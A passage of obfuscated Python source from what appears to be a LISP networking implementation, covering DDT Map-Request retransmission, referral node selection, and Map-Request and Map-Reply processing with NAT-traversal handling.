lprint ( "DDT Map-Request retry limit reached for EID {}, nonce 0x{}" . format ( green ( o0OOoooO0 , False ) , lisp_hex_string ( o0Oo0o ) ) )
if 14 - 14: iIii1I11I1II1 + i11iIiiIii + o0oOOo0O0Ooo + o0oOOo0O0Ooo - IiII / I1Ii111
mr . dequeue_map_request ( )
return
if 70 - 70: OoooooooOO + I1IiiI / OOooOOo
if 19 - 19: I1Ii111 + i1IIi % OoooooooOO + i1IIi
mr . retry_count += 1
if 16 - 16: I1Ii111 + II111iiii + IiII
I111 = green ( IiIiI11111i1i , False )
IiI11I111 = green ( o0OOoooO0 , False )
lprint ( "Retransmit DDT {} from {}ITR {} EIDs: {} -> {}, nonce 0x{}" . format ( bold ( "Map-Request" , False ) , "P" if mr . from_pitr else "" ,
# o0oOOo0O0Ooo - oO0o . II111iiii
red ( mr . itr . print_address ( ) , False ) , I111 , IiI11I111 ,
lisp_hex_string ( o0Oo0o ) ) )
if 39 - 39: OoOoOO00 - OOooOOo / II111iiii * OoooooooOO - OoO0O00 . I1IiiI
if 89 - 89: IiII
if 73 - 73: II111iiii + ooOoO0o % OOooOOo . oO0o / oO0o * i1IIi
if 19 - 19: I1Ii111 + I11i
lisp_send_ddt_map_request ( mr , False )
if 21 - 21: OoOoOO00
if 2 - 2: i1IIi . OOooOOo
if 23 - 23: Ii1I - OOooOOo
if 89 - 89: i11iIiiIii
mr . retransmit_timer = threading . Timer ( LISP_DDT_MAP_REQUEST_INTERVAL ,
lisp_retransmit_ddt_map_request , [ mr ] )
mr . retransmit_timer . start ( )
return
if 40 - 40: OoooooooOO % OoO0O00
if 54 - 54: i1IIi * OOooOOo - oO0o * OoooooooOO + II111iiii . IiII
if 90 - 90: O0 - II111iiii + I1IiiI . iII111i
if 3 - 3: o0oOOo0O0Ooo + i1IIi * Oo0Ooo
if 6 - 6: OoO0O00 * OoooooooOO * iIii1I11I1II1
if 87 - 87: iIii1I11I1II1 - ooOoO0o * iIii1I11I1II1
if 79 - 79: ooOoO0o . oO0o + Ii1I * ooOoO0o + O0 . II111iiii
if 8 - 8: IiII * OOooOOo + I11i + O0 * oO0o - oO0o
def lisp_get_referral_node ( referral , source_eid , dest_eid ) :
if 19 - 19: OoO0O00 - ooOoO0o + I1ii11iIi11i / I1ii11iIi11i % I1Ii111 % iIii1I11I1II1
if 5 - 5: OoooooooOO + ooOoO0o - II111iiii . i11iIiiIii / oO0o - ooOoO0o
if 3 - 3: iII111i
if 74 - 74: i11iIiiIii + OoooooooOO . OOooOOo
i1IIIIiiII1 = [ ]
for oooO00ooo00 in list ( referral . referral_set . values ( ) ) :
if ( oooO00ooo00 . updown == False ) : continue
if ( len ( i1IIIIiiII1 ) == 0 or i1IIIIiiII1 [ 0 ] . priority == oooO00ooo00 . priority ) :
i1IIIIiiII1 . append ( oooO00ooo00 )
elif ( i1IIIIiiII1 [ 0 ] . priority > oooO00ooo00 . priority ) :
i1IIIIiiII1 = [ ]
i1IIIIiiII1 . append ( oooO00ooo00 )
if 56 - 56: OoOoOO00 * II111iiii * o0oOOo0O0Ooo - I1IiiI + OoOoOO00 - O0
if 48 - 48: OoooooooOO % Ii1I * OoO0O00 / I1ii11iIi11i
if 53 - 53: ooOoO0o + oO0o - II111iiii
OOo000Oo = len ( i1IIIIiiII1 )
if ( OOo000Oo == 0 ) : return ( None )
if 19 - 19: oO0o . i1IIi . Oo0Ooo
II1Iii1iI = dest_eid . hash_address ( source_eid )
II1Iii1iI = II1Iii1iI % OOo000Oo
return ( i1IIIIiiII1 [ II1Iii1iI ] )
if 59 - 59: i1IIi / Ii1I . I1ii11iIi11i % II111iiii
if 12 - 12: OoO0O00
if 10 - 10: I1Ii111 / OoooooooOO / OoO0O00 * ooOoO0o
if 81 - 81: i1IIi % I11i * iIii1I11I1II1
if 39 - 39: iIii1I11I1II1 / O0 . OoooooooOO - O0 . OoO0O00 . oO0o
if 59 - 59: II111iiii * I1IiiI
if 12 - 12: i11iIiiIii - IiII . iII111i . Ii1I
def lisp_send_ddt_map_request ( mr , send_to_root ) :
IiI11IIIIIi = mr . lisp_sockets
o0Oo0o = mr . nonce
oO0oO00OO00 = mr . itr
Ii1OoOoOoO = mr . mr_source
i1iiii = mr . print_eid_tuple ( )
if 97 - 97: OoO0O00 + I1IiiI . i11iIiiIii
if 48 - 48: iIii1I11I1II1 / OOooOOo + I1Ii111
if 85 - 85: Ii1I % ooOoO0o . I1IiiI
if 47 - 47: I1Ii111 - I1ii11iIi11i * OoO0O00 % IiII % ooOoO0o . I1IiiI
if 96 - 96: II111iiii
if ( mr . send_count == 8 ) :
lprint ( "Giving up on map-request-queue entry {}, nonce 0x{}" . format ( green ( i1iiii , False ) , lisp_hex_string ( o0Oo0o ) ) )
if 73 - 73: II111iiii
mr . dequeue_map_request ( )
return
if 81 - 81: I1IiiI + OoO0O00
if 22 - 22: OoO0O00 * OoOoOO00 * I11i * IiII . OoO0O00 . I1ii11iIi11i
if 32 - 32: o0oOOo0O0Ooo - iII111i + i11iIiiIii / ooOoO0o . OoOoOO00 . IiII
if 9 - 9: iIii1I11I1II1
if 66 - 66: iIii1I11I1II1
if 13 - 13: O0 / ooOoO0o
if ( send_to_root ) :
OoooOO0 = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
iI111iiI = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
mr . tried_root = True
lprint ( "Jumping up to root for EID {}" . format ( green ( i1iiii , False ) ) )
else :
OoooOO0 = mr . eid
iI111iiI = mr . group
if 6 - 6: iII111i + II111iiii . IiII . Ii1I / ooOoO0o / I11i
if 85 - 85: ooOoO0o / II111iiii / OoO0O00 + Ii1I / i1IIi . iII111i
if 65 - 65: iIii1I11I1II1 * O0 . II111iiii * o0oOOo0O0Ooo . I1ii11iIi11i * I1IiiI
if 63 - 63: II111iiii . Oo0Ooo % iIii1I11I1II1
if 85 - 85: I1IiiI + i1IIi % I1Ii111
oooo0o0o00o = lisp_referral_cache_lookup ( OoooOO0 , iI111iiI , False )
if ( oooo0o0o00o == None ) :
lprint ( "No referral cache entry found" )
lisp_send_negative_map_reply ( IiI11IIIIIi , OoooOO0 , iI111iiI ,
o0Oo0o , oO0oO00OO00 , mr . sport , 15 , None , False )
return
if 23 - 23: I11i - oO0o % i11iIiiIii % I1ii11iIi11i + OOooOOo
if 64 - 64: OOooOOo - I11i / I1ii11iIi11i . Ii1I
i1IO0ooo00 = oooo0o0o00o . print_eid_tuple ( )
lprint ( "Found referral cache entry {}, referral-type: {}" . format ( i1IO0ooo00 ,
oooo0o0o00o . print_referral_type ( ) ) )
if 86 - 86: oO0o + OOooOOo . o0oOOo0O0Ooo
oooO00ooo00 = lisp_get_referral_node ( oooo0o0o00o , Ii1OoOoOoO , mr . eid )
if ( oooO00ooo00 == None ) :
lprint ( "No reachable referral-nodes found" )
mr . dequeue_map_request ( )
lisp_send_negative_map_reply ( IiI11IIIIIi , oooo0o0o00o . eid ,
oooo0o0o00o . group , o0Oo0o , oO0oO00OO00 , mr . sport , 1 , None , False )
return
if 37 - 37: i1IIi + iII111i - IiII + ooOoO0o . i1IIi % i11iIiiIii
if 92 - 92: I1IiiI
lprint ( "Send DDT Map-Request to {} {} for EID {}, nonce 0x{}" . format ( oooO00ooo00 . referral_address . print_address ( ) ,
# OoO0O00 - I11i - Oo0Ooo
oooo0o0o00o . print_referral_type ( ) , green ( i1iiii , False ) ,
lisp_hex_string ( o0Oo0o ) ) )
if 57 - 57: I1Ii111 % i11iIiiIii
if 36 - 36: O0 . I11i / o0oOOo0O0Ooo + i1IIi + oO0o * IiII
if 29 - 29: O0 - II111iiii + iII111i
if 73 - 73: I1Ii111 - I11i + IiII - o0oOOo0O0Ooo - I11i - OOooOOo
Ii1oO0o0ooo = ( oooo0o0o00o . referral_type == LISP_DDT_ACTION_MS_REFERRAL or
oooo0o0o00o . referral_type == LISP_DDT_ACTION_MS_ACK )
lisp_send_ecm ( IiI11IIIIIi , mr . packet , Ii1OoOoOoO , mr . sport , mr . eid ,
oooO00ooo00 . referral_address , to_ms = Ii1oO0o0ooo , ddt = True )
if 33 - 33: i11iIiiIii . iII111i % o0oOOo0O0Ooo
if 35 - 35: OoO0O00 + OOooOOo % II111iiii * Ii1I / OoOoOO00
if 71 - 71: OOooOOo / i1IIi
if 50 - 50: iIii1I11I1II1 * IiII
mr . last_request_sent_to = oooO00ooo00 . referral_address
mr . last_sent = lisp_get_timestamp ( )
mr . send_count += 1
oooO00ooo00 . map_requests_sent += 1
return
if 73 - 73: II111iiii
if 4 - 4: II111iiii * o0oOOo0O0Ooo + I11i . II111iiii
if 35 - 35: ooOoO0o - ooOoO0o . i1IIi % oO0o * IiII * I1ii11iIi11i
if 36 - 36: OoOoOO00 % ooOoO0o - Oo0Ooo - OoooooooOO % I1ii11iIi11i / OoOoOO00
if 23 - 23: ooOoO0o . O0 % O0 - iIii1I11I1II1 / IiII
if 8 - 8: i11iIiiIii . Oo0Ooo / i11iIiiIii % IiII
if 41 - 41: iII111i * I11i % OoooooooOO * iIii1I11I1II1
if 73 - 73: I1Ii111 * I1ii11iIi11i
def lisp_mr_process_map_request ( lisp_sockets , packet , map_request , ecm_source ,
sport , mr_source ) :
if 79 - 79: I11i / O0 % Ii1I % I1ii11iIi11i
o0Ooo0Oooo0o = map_request . target_eid
oo0oOooo0O = map_request . target_group
o0OOoooO0 = map_request . print_eid_tuple ( )
IiIiI11111i1i = mr_source . print_address ( )
o0Oo0o = map_request . nonce
if 21 - 21: OoOoOO00 . ooOoO0o * OoO0O00 - OoOoOO00 - OoooooooOO
I111 = green ( IiIiI11111i1i , False )
IiI11I111 = green ( o0OOoooO0 , False )
lprint ( "Received Map-Request from {}ITR {} EIDs: {} -> {}, nonce 0x{}" . format ( "P" if map_request . pitr_bit else "" ,
# OoO0O00 * I1Ii111
red ( ecm_source . print_address ( ) , False ) , I111 , IiI11I111 ,
lisp_hex_string ( o0Oo0o ) ) )
if 56 - 56: oO0o
if 52 - 52: i1IIi % iIii1I11I1II1 . I1Ii111 / iII111i
if 31 - 31: Ii1I - o0oOOo0O0Ooo % oO0o / OoO0O00 * I11i
if 24 - 24: i1IIi
iii1i = lisp_ddt_map_request ( lisp_sockets , packet , o0Ooo0Oooo0o , oo0oOooo0O , o0Oo0o )
iii1i . packet = packet
iii1i . itr = ecm_source
iii1i . mr_source = mr_source
iii1i . sport = sport
iii1i . from_pitr = map_request . pitr_bit
iii1i . queue_map_request ( )
if 4 - 4: i11iIiiIii * i1IIi / OOooOOo + iIii1I11I1II1 - II111iiii / I11i
lisp_send_ddt_map_request ( iii1i , False )
return
if 67 - 67: I1ii11iIi11i . OOooOOo / ooOoO0o / I1Ii111 . I11i
if 54 - 54: I1ii11iIi11i - I1IiiI . OoOoOO00
if 36 - 36: OoO0O00 * I1IiiI / iII111i
if 95 - 95: Ii1I . Oo0Ooo
if 42 - 42: IiII . i1IIi % O0 * ooOoO0o - OOooOOo % ooOoO0o
if 99 - 99: i1IIi + OoOoOO00 - iII111i % II111iiii
if 6 - 6: ooOoO0o - I1Ii111 . OoOoOO00
def lisp_process_map_request ( lisp_sockets , packet , ecm_source , ecm_port ,
mr_source , mr_port , ddt_request , ttl , timestamp ) :
if 64 - 64: iII111i + I1ii11iIi11i
i1o0o0oOO = packet
O0Ooo = lisp_map_request ( )
packet = O0Ooo . decode ( packet , mr_source , mr_port )
if ( packet == None ) :
lprint ( "Could not decode Map-Request packet" )
return
if 10 - 10: ooOoO0o / II111iiii
if 30 - 30: i1IIi * Ii1I + Ii1I / I1Ii111
O0Ooo . print_map_request ( )
if 84 - 84: I1IiiI - Oo0Ooo * OoO0O00 * oO0o
if 13 - 13: I1Ii111 * i11iIiiIii % o0oOOo0O0Ooo + oO0o - iII111i
if 32 - 32: I1Ii111 / I1ii11iIi11i - Ii1I % o0oOOo0O0Ooo * I1Ii111 % II111iiii
if 33 - 33: ooOoO0o % I11i
if ( O0Ooo . rloc_probe ) :
lisp_process_rloc_probe_request ( lisp_sockets , O0Ooo , mr_source ,
mr_port , ttl , timestamp )
return
if 72 - 72: OoO0O00 % OoooooooOO / II111iiii * oO0o * I1Ii111
if 98 - 98: OOooOOo * Ii1I + I1ii11iIi11i / iIii1I11I1II1 / OoOoOO00 + I1IiiI
if 74 - 74: ooOoO0o . IiII . O0 * I1IiiI * oO0o
if 6 - 6: O0 . Ii1I / Oo0Ooo * o0oOOo0O0Ooo
if 1 - 1: i11iIiiIii
if ( O0Ooo . smr_bit ) :
lisp_process_smr ( O0Ooo )
if 30 - 30: I11i
if 26 - 26: Oo0Ooo - II111iiii % ooOoO0o
if 81 - 81: i11iIiiIii + I1ii11iIi11i * oO0o
if 86 - 86: OoO0O00 . ooOoO0o . o0oOOo0O0Ooo
if 70 - 70: O0 % OoooooooOO - Ii1I * Oo0Ooo
if ( O0Ooo . smr_invoked_bit ) :
lisp_process_smr_invoked_request ( O0Ooo )
if 18 - 18: OOooOOo . I1IiiI + i1IIi . I1IiiI
if 3 - 3: O0 * O0 + II111iiii + OoOoOO00 * I11i % Oo0Ooo
if 19 - 19: oO0o % IiII % OoooooooOO % I1ii11iIi11i / OoO0O00
if 6 - 6: O0 * I1Ii111 - II111iiii
if 60 - 60: oO0o % oO0o
if ( lisp_i_am_etr ) :
lisp_etr_process_map_request ( lisp_sockets , O0Ooo , mr_source ,
mr_port , ttl , timestamp )
if 76 - 76: I1Ii111 / o0oOOo0O0Ooo
if 19 - 19: O0 . i1IIi % iIii1I11I1II1 + OOooOOo * OoOoOO00 / I11i
if 82 - 82: I1ii11iIi11i
if 75 - 75: I11i - II111iiii
if 84 - 84: I1ii11iIi11i * IiII / I1IiiI - Ii1I + IiII - i1IIi
if ( lisp_i_am_ms ) :
packet = i1o0o0oOO
o0Ooo0Oooo0o , oo0oOooo0O , Oo00Oo00O = lisp_ms_process_map_request ( lisp_sockets ,
i1o0o0oOO , O0Ooo , mr_source , mr_port , ecm_source )
if ( ddt_request ) :
lisp_ms_send_map_referral ( lisp_sockets , O0Ooo , ecm_source ,
ecm_port , Oo00Oo00O , o0Ooo0Oooo0o , oo0oOooo0O )
if 67 - 67: iII111i + OoOoOO00 * o0oOOo0O0Ooo / II111iiii / iIii1I11I1II1
return
if 12 - 12: o0oOOo0O0Ooo
if 13 - 13: o0oOOo0O0Ooo
if 45 - 45: OoO0O00 % OoO0O00 % O0
if 62 - 62: IiII - iII111i . I1ii11iIi11i . oO0o
if 22 - 22: OoOoOO00 * i11iIiiIii * Ii1I
if ( lisp_i_am_mr and not ddt_request ) :
lisp_mr_process_map_request ( lisp_sockets , i1o0o0oOO , O0Ooo ,
ecm_source , mr_port , mr_source )
if 43 - 43: iIii1I11I1II1 / iII111i - Ii1I + I11i % iII111i - OoO0O00
if 5 - 5: OoO0O00 / ooOoO0o
if 92 - 92: Oo0Ooo / iII111i + O0 * ooOoO0o * OOooOOo % Oo0Ooo
if 97 - 97: oO0o / Ii1I
if 70 - 70: iII111i / Oo0Ooo . OoOoOO00 - II111iiii * II111iiii % I1IiiI
if ( lisp_i_am_ddt or ddt_request ) :
packet = i1o0o0oOO
lisp_ddt_process_map_request ( lisp_sockets , O0Ooo , ecm_source ,
ecm_port )
if 34 - 34: I1Ii111 + OOooOOo * iII111i / ooOoO0o % i11iIiiIii
return
if 91 - 91: IiII * Ii1I * OOooOOo
if 17 - 17: o0oOOo0O0Ooo + Ii1I % I1ii11iIi11i + IiII % I1Ii111 + I1ii11iIi11i
if 100 - 100: I11i * OoO0O00 - i1IIi + iII111i * Ii1I - OoooooooOO
if 47 - 47: o0oOOo0O0Ooo / Ii1I - iII111i * OOooOOo / i11iIiiIii
if 97 - 97: iIii1I11I1II1 + OoOoOO00 + OoOoOO00 * o0oOOo0O0Ooo
if 14 - 14: II111iiii + I1ii11iIi11i * Oo0Ooo
if 95 - 95: IiII + iII111i % I1IiiI
if 18 - 18: Oo0Ooo
def lisp_store_mr_stats ( source , nonce ) :
iii1i = lisp_get_map_resolver ( source , None )
if ( iii1i == None ) : return
if 8 - 8: O0 + iIii1I11I1II1 - O0
if 67 - 67: O0
if 22 - 22: I11i / i1IIi . II111iiii % ooOoO0o / I11i - Ii1I
if 28 - 28: O0 - Oo0Ooo
iii1i . neg_map_replies_received += 1
iii1i . last_reply = lisp_get_timestamp ( )
if 58 - 58: iIii1I11I1II1 - OoooooooOO - iII111i
if 43 - 43: ooOoO0o / o0oOOo0O0Ooo
if 56 - 56: II111iiii * I1ii11iIi11i * O0 . iII111i . I1ii11iIi11i % I1Ii111
if 99 - 99: Oo0Ooo - OoO0O00 + OoooooooOO - I1Ii111 - I1ii11iIi11i % i1IIi
if ( ( iii1i . neg_map_replies_received % 100 ) == 0 ) : iii1i . total_rtt = 0
if 49 - 49: IiII % OoooooooOO / Oo0Ooo - OoOoOO00 + o0oOOo0O0Ooo / Ii1I
if 6 - 6: I11i % IiII
if 48 - 48: Ii1I
if 100 - 100: OoO0O00 % I1Ii111 + OoooooooOO / OoO0O00
if ( iii1i . last_nonce == nonce ) :
iii1i . total_rtt += ( time . time ( ) - iii1i . last_used )
iii1i . last_nonce = 0
if 62 - 62: IiII
if ( ( iii1i . neg_map_replies_received % 10 ) == 0 ) : iii1i . last_nonce = 0
return
if 66 - 66: o0oOOo0O0Ooo % OOooOOo
if 15 - 15: Ii1I % IiII + IiII % iII111i - O0 * OoooooooOO
if 53 - 53: OoOoOO00 . Ii1I / Oo0Ooo
if 62 - 62: i11iIiiIii
if 38 - 38: I1ii11iIi11i % ooOoO0o * OoooooooOO + iIii1I11I1II1 % i1IIi / OOooOOo
if 6 - 6: i11iIiiIii
if 8 - 8: iIii1I11I1II1 + I1ii11iIi11i . i1IIi % OoOoOO00 % OoooooooOO * Oo0Ooo
def lisp_process_map_reply ( lisp_sockets , packet , source , ttl , itr_in_ts ) :
global lisp_map_cache
if 53 - 53: oO0o
IiOo0oOoooO = lisp_map_reply ( )
packet = IiOo0oOoooO . decode ( packet )
if ( packet == None ) :
lprint ( "Could not decode Map-Reply packet" )
return
if 23 - 23: I1ii11iIi11i . I1Ii111 + OOooOOo
IiOo0oOoooO . print_map_reply ( )
if 4 - 4: I1IiiI
if 31 - 31: ooOoO0o * i1IIi . O0
if 5 - 5: OOooOOo . I1ii11iIi11i + ooOoO0o . ooOoO0o + iII111i
if 100 - 100: I1Ii111
O0oo0OOo00o0o = None
for iIi1iIIIiIiI in range ( IiOo0oOoooO . record_count ) :
o0o0Ooo0OO00o = lisp_eid_record ( )
packet = o0o0Ooo0OO00o . decode ( packet )
if ( packet == None ) :
lprint ( "Could not decode EID-record in Map-Reply packet" )
return
if 18 - 18: iII111i
o0o0Ooo0OO00o . print_record ( " " , False )
if 98 - 98: IiII . OOooOOo * ooOoO0o / OoO0O00
if 21 - 21: OOooOOo / OoO0O00 + OoooooooOO
if 66 - 66: II111iiii * I11i + iII111i * iII111i . i11iIiiIii % Ii1I
if 96 - 96: I1IiiI . O0 / iIii1I11I1II1
if 95 - 95: ooOoO0o * OoO0O00 % OoooooooOO % OoO0O00
if ( o0o0Ooo0OO00o . rloc_count == 0 ) :
lisp_store_mr_stats ( source , IiOo0oOoooO . nonce )
if 79 - 79: II111iiii % Ii1I * oO0o * iII111i + II111iiii
if 51 - 51: I1IiiI + iII111i + I1IiiI / Ii1I * IiII + OOooOOo
II1OO0Oo0oOOO000 = ( o0o0Ooo0OO00o . group . is_null ( ) == False )
if 70 - 70: I11i . IiII + IiII
if 74 - 74: Ii1I
if 11 - 11: I1ii11iIi11i
if 83 - 83: O0
if 97 - 97: O0
if ( lisp_decent_push_configured ) :
oOoO0OooO0O = o0o0Ooo0OO00o . action
if ( II1OO0Oo0oOOO000 and oOoO0OooO0O == LISP_DROP_ACTION ) :
if ( o0o0Ooo0OO00o . eid . is_local ( ) ) : continue
if 50 - 50: I1Ii111 / OoooooooOO . o0oOOo0O0Ooo + I1IiiI * i11iIiiIii
if 28 - 28: I1Ii111 * II111iiii
if 14 - 14: iIii1I11I1II1 / Ii1I + o0oOOo0O0Ooo . iII111i % iII111i . i1IIi
if 67 - 67: IiII * II111iiii + ooOoO0o - i11iIiiIii
if 15 - 15: I11i
if 67 - 67: iIii1I11I1II1
if 91 - 91: ooOoO0o
if ( II1OO0Oo0oOOO000 == False and o0o0Ooo0OO00o . eid . is_null ( ) ) : continue
if 66 - 66: OOooOOo
if 5 - 5: i1IIi * OoOoOO00 + i1IIi % I11i
if 79 - 79: OOooOOo % iIii1I11I1II1 / OoOoOO00
if 9 - 9: Ii1I
if 44 - 44: iII111i
if ( II1OO0Oo0oOOO000 ) :
I11iiI1III = lisp_map_cache_lookup ( o0o0Ooo0OO00o . eid , o0o0Ooo0OO00o . group )
else :
I11iiI1III = lisp_map_cache . lookup_cache ( o0o0Ooo0OO00o . eid , True )
if 43 - 43: OoO0O00 % OOooOOo + oO0o
IiIii1Ii = ( I11iiI1III == None )
if 37 - 37: Oo0Ooo / i1IIi + OoO0O00
if 83 - 83: OOooOOo / OOooOOo * OOooOOo . I1ii11iIi11i . iII111i % OOooOOo
if 63 - 63: iII111i - o0oOOo0O0Ooo * OOooOOo . Ii1I . Ii1I
if 7 - 7: i11iIiiIii . I1ii11iIi11i
if 4 - 4: i11iIiiIii % OoO0O00 . oO0o
if ( I11iiI1III == None ) :
Ooo00O , Oo0OoO00O , ii1I1I1iII = lisp_allow_gleaning ( o0o0Ooo0OO00o . eid , o0o0Ooo0OO00o . group ,
None )
if ( Ooo00O ) : continue
else :
if ( I11iiI1III . gleaned ) : continue
if 89 - 89: Oo0Ooo / Ii1I * OoO0O00 + ooOoO0o
if 41 - 41: IiII + I11i * ooOoO0o + Oo0Ooo . ooOoO0o
if 38 - 38: iII111i * OoooooooOO - IiII
if 36 - 36: I1Ii111 * II111iiii + I1ii11iIi11i - iII111i * iII111i
if 91 - 91: O0 + I1Ii111 * II111iiii - O0 . i11iIiiIii . Oo0Ooo
OO00O000OOO = [ ]
O0o00O00oo0oO = None
for I1I1II1iI in range ( o0o0Ooo0OO00o . rloc_count ) :
ooOoooO = lisp_rloc_record ( )
ooOoooO . keys = IiOo0oOoooO . keys
packet = ooOoooO . decode ( packet , IiOo0oOoooO . nonce )
if ( packet == None ) :
lprint ( "Could not decode RLOC-record in Map-Reply packet" )
return
if 80 - 80: oO0o + O0
ooOoooO . print_record ( " " )
if 84 - 84: i1IIi - II111iiii
ii1II1i1 = None
if ( I11iiI1III ) : ii1II1i1 = I11iiI1III . get_rloc ( ooOoooO . rloc )
if ( ii1II1i1 ) :
iIIiI11 = ii1II1i1
else :
iIIiI11 = lisp_rloc ( )
if 5 - 5: IiII % oO0o . I1IiiI * II111iiii + o0oOOo0O0Ooo / Ii1I
if 55 - 55: Oo0Ooo / o0oOOo0O0Ooo
if 51 - 51: I1IiiI + i11iIiiIii / ooOoO0o % I1IiiI + Oo0Ooo
if 6 - 6: OoOoOO00 . O0
if 44 - 44: ooOoO0o % I11i + ooOoO0o . oO0o
if 70 - 70: O0 - I11i . iIii1I11I1II1 % I11i . OoOoOO00 % oO0o
if 5 - 5: O0 * OoO0O00
ooO0 = iIIiI11 . store_rloc_from_record ( ooOoooO , IiOo0oOoooO . nonce ,
source )
iIIiI11 . echo_nonce_capable = IiOo0oOoooO . echo_nonce_capable
if 61 - 61: Ii1I / I11i + Ii1I . IiII - OoO0O00 - o0oOOo0O0Ooo
if ( iIIiI11 . echo_nonce_capable ) :
O0O0 = iIIiI11 . rloc . print_address_no_iid ( )
if ( lisp_get_echo_nonce ( None , O0O0 ) == None ) :
lisp_echo_nonce ( O0O0 )
if 84 - 84: OoooooooOO - Oo0Ooo
if 86 - 86: O0 + OoO0O00 + O0 . I1IiiI
if 82 - 82: OoOoOO00
if 61 - 61: oO0o . o0oOOo0O0Ooo
if 82 - 82: Oo0Ooo * OoooooooOO / ooOoO0o / I1IiiI
if 70 - 70: I1IiiI
if ( iIIiI11 . json ) :
if ( lisp_is_json_telemetry ( iIIiI11 . json . json_string ) ) :
I1i1iiII1iI1i = iIIiI11 . json . json_string
I1i1iiII1iI1i = lisp_encode_telemetry ( I1i1iiII1iI1i , ii = itr_in_ts )
iIIiI11 . json . json_string = I1i1iiII1iI1i
if 74 - 74: ooOoO0o * II111iiii
if 96 - 96: i11iIiiIii . I1IiiI - II111iiii . I11i
if 79 - 79: OoO0O00 . OoOoOO00 - i1IIi + Ii1I * i11iIiiIii . OoooooooOO
if 83 - 83: o0oOOo0O0Ooo / oO0o
if 24 - 24: Ii1I + oO0o / OoooooooOO % i11iIiiIii
if 1 - 1: iII111i / I1Ii111 * I1IiiI + OoOoOO00 . OoooooooOO
if 5 - 5: I1IiiI
if 74 - 74: i1IIi * Oo0Ooo - OoOoOO00 * o0oOOo0O0Ooo
if 85 - 85: iIii1I11I1II1 * IiII / i11iIiiIii - ooOoO0o - o0oOOo0O0Ooo
if 30 - 30: OoOoOO00 - OOooOOo . Oo0Ooo
if ( IiOo0oOoooO . rloc_probe and ooOoooO . probe_bit ) :
if ( iIIiI11 . rloc . afi == source . afi ) :
lisp_process_rloc_probe_reply ( iIIiI11 , source , ooO0 ,
IiOo0oOoooO , ttl , O0o00O00oo0oO )
if 11 - 11: IiII - I1Ii111 - OoO0O00 * o0oOOo0O0Ooo
if ( iIIiI11 . rloc . is_multicast_address ( ) ) : O0o00O00oo0oO = iIIiI11
if 99 - 99: O0 - OoO0O00
if 95 - 95: Ii1I . IiII * o0oOOo0O0Ooo
if 91 - 91: I1Ii111
if 49 - 49: I11i
if 17 - 17: Oo0Ooo % o0oOOo0O0Ooo
OO00O000OOO . append ( iIIiI11 )
if 3 - 3: OoO0O00 . oO0o . oO0o . Ii1I
if 100 - 100: i11iIiiIii / i1IIi . I1ii11iIi11i
if 1 - 1: IiII * I1Ii111 / I1ii11iIi11i * i11iIiiIii
if 82 - 82: o0oOOo0O0Ooo * OoO0O00 / o0oOOo0O0Ooo % OoOoOO00 * iIii1I11I1II1 % O0
if ( lisp_data_plane_security and iIIiI11 . rloc_recent_rekey ( ) ) :
O0oo0OOo00o0o = iIIiI11
if 10 - 10: ooOoO0o
if 69 - 69: I11i + I1IiiI / oO0o
if 89 - 89: i1IIi % OoOoOO00 . I1ii11iIi11i
if 85 - 85: I1Ii111 - oO0o
if 34 - 34: iIii1I11I1II1 / IiII + OoOoOO00 - IiII / ooOoO0o + OoOoOO00
if 96 - 96: oO0o
if 44 - 44: OoooooooOO / iII111i * Oo0Ooo % OoOoOO00 . oO0o
if 97 - 97: iIii1I11I1II1 / ooOoO0o
if 16 - 16: Oo0Ooo % IiII
if 48 - 48: I1IiiI . I1Ii111 . o0oOOo0O0Ooo
if 72 - 72: Ii1I * OoO0O00 / OoO0O00
if ( IiOo0oOoooO . rloc_probe == False and lisp_nat_traversal ) :
Oo0O0O0oo0 = [ ]
iII1Ii1Ii = [ ]
for iIIiI11 in OO00O000OOO :
if 27 - 27: OoOoOO00 + I1ii11iIi11i - OoOoOO00 . iIii1I11I1II1
if 72 - 72: OoO0O00 / I1IiiI . Ii1I
if 11 - 11: I1Ii111 + OoO0O00 / i1IIi - i1IIi
if 14 - 14: Ii1I - o0oOOo0O0Ooo
if 14 - 14: OoO0O00 * OoO0O00 - I1ii11iIi11i
if ( iIIiI11 . rloc . is_private_address ( ) ) :
iIIiI11 . priority = 1
iIIiI11 . state = LISP_RLOC_UNREACH_STATE
Oo0O0O0oo0 . append ( iIIiI11 )
iII1Ii1Ii . append ( iIIiI11 . rloc . print_address_no_iid ( ) )
continue
if 90 - 90: Oo0Ooo . II111iiii + I1ii11iIi11i - OoOoOO00 / I11i * iII111i
if 58 - 58: oO0o + Oo0Ooo . O0
if 8 - 8: II111iiii + iII111i + OoO0O00 - Ii1I / I1ii11iIi11i
if 86 - 86: I1ii11iIi11i
if 43 - 43: IiII - I1Ii111 / I1Ii111
if 25 - 25: OoOoOO00
if ( iIIiI11 . priority == 254 and lisp_i_am_rtr == False ) :
Oo0O0O0oo0 . append ( iIIiI11 )
iII1Ii1Ii . append ( iIIiI11 . rloc . print_address_no_iid ( ) )
if 52 - 52: OOooOOo + IiII
if ( iIIiI11 . priority != 254 and lisp_i_am_rtr ) :
Oo0O0O0oo0 . append ( iIIiI11 )
iII1Ii1Ii . append ( iIIiI11 . rloc . print_address_no_iid ( ) )
if 73 - 73: OoooooooOO - I1Ii111 % iII111i / OOooOOo . o0oOOo0O0Ooo - IiII
if 69 - 69: Ii1I . iIii1I11I1II1 / Oo0Ooo * Oo0Ooo % IiII
if 5 - 5: OOooOOo - I1Ii111 + IiII
if ( iII1Ii1Ii != [ ] ) :
OO00O000OOO = Oo0O0O0oo0
lprint ( "NAT-traversal optimized RLOC-set: {}" . format ( iII1Ii1Ii ) )
if 82 - 82: OOooOOo
if 26 - 26: ooOoO0o + OoooooooOO + ooOoO0o * I1Ii111
if 26 - 26: I1IiiI - OOooOOo
if 34 - 34: I1Ii111 % I1IiiI . OoOoOO00 / iII111i + ooOoO0o . i11iIiiIii
if 51 - 51: OoooooooOO * I1Ii111 * I11i - I1ii11iIi11i + I1Ii111
if 50 - 50: OoooooooOO * II111iiii
if 7 - 7: ooOoO0o / I11i * iII111i
Oo0O0O0oo0 = [ ]
for iIIiI11 in OO00O000OOO :
if ( iIIiI11 . json != None ) : continue
Oo0O0O0oo0 . append ( iIIiI11 )
if 17 - 17: O0 % I1Ii111
if ( Oo0O0O0oo0 != [ ] ) :
O0oo0oOo = len ( OO00O000OOO ) - len ( Oo0O0O0oo0 )
lprint ( "Pruning {} no-address RLOC-records for map-cache" . format ( O0oo0oOo ) )
if 28 - 28: i1IIi * ooOoO0o
OO00O000OOO = Oo0O0O0oo0
